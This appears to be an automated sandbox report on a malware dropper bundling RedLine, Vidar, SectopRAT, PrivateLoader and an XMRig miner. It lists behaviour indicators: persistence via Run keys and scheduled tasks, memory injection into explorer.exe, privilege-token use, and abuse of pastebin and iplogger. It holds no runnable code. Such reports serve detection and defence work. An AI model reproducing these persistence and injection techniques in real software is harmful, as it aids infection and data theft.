Malware Analysis Report

2025-01-02 06:04

Sample ID 241206-pdd5zasnfp
Target cceff411feab78a02a22744e2eae9ab8_JaffaCakes118
SHA256 cfdcbcca4f75f287d6389cda895571530ddb9a2bbdf54cce52c1c65e969ac0a3
Tags
nullmixer privateloader redline sectoprat vidar xmrig build1 aspackv2 discovery dropper execution infostealer loader miner persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

cfdcbcca4f75f287d6389cda895571530ddb9a2bbdf54cce52c1c65e969ac0a3

Threat Level: Known bad

The file cceff411feab78a02a22744e2eae9ab8_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

nullmixer privateloader redline sectoprat vidar xmrig build1 aspackv2 discovery dropper execution infostealer loader miner persistence rat spyware stealer trojan

SectopRAT

PrivateLoader

Vidar family

RedLine payload

Sectoprat family

xmrig

Xmrig family

Nullmixer family

Redline family

Privateloader family

SectopRAT payload

RedLine

Vidar

NullMixer

XMRig Miner payload

Vidar Stealer

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Loads dropped DLL

ASPack v2.12-2.42

Checks computer location settings

Reads user/profile data of web browsers

Looks up external IP address via web service

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in Windows directory

Browser Information Discovery

Enumerates physical storage devices

Program crash

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies system certificate store

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Uses Task Scheduler COM API

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-06 12:12

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-12-06 12:12

Reported

2024-12-06 12:15

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Vidar

stealer vidar

Vidar family

vidar

Xmrig family

xmrig

xmrig

miner xmrig

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services64.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\e4f0738cc5646a38.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A
N/A api.db-ip.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1000 set thread context of 4760 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 4604 set thread context of 5580 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\621c13b77.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\caa4baaf544.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\6f1aa71747b4a291.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 972 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe
PID 972 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe
PID 972 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe
PID 3016 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 264 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 264 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 264 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3692 wrote to memory of 3616 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\e4f0738cc5646a38.exe
PID 3692 wrote to memory of 3616 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\e4f0738cc5646a38.exe
PID 1324 wrote to memory of 3252 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe
PID 1324 wrote to memory of 3252 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe
PID 1324 wrote to memory of 3252 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe
PID 3844 wrote to memory of 4876 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\caa4baaf544.exe
PID 3844 wrote to memory of 4876 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\caa4baaf544.exe
PID 2704 wrote to memory of 3312 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe
PID 2704 wrote to memory of 3312 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe
PID 2704 wrote to memory of 3312 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe
PID 1112 wrote to memory of 4800 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\6f1aa71747b4a291.exe
PID 1112 wrote to memory of 4800 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\6f1aa71747b4a291.exe
PID 3616 wrote to memory of 1000 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\e4f0738cc5646a38.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 3616 wrote to memory of 1000 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\e4f0738cc5646a38.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 3616 wrote to memory of 1000 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\e4f0738cc5646a38.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 2544 wrote to memory of 2732 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\24ebc9ce784c63.exe
PID 2544 wrote to memory of 2732 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\24ebc9ce784c63.exe
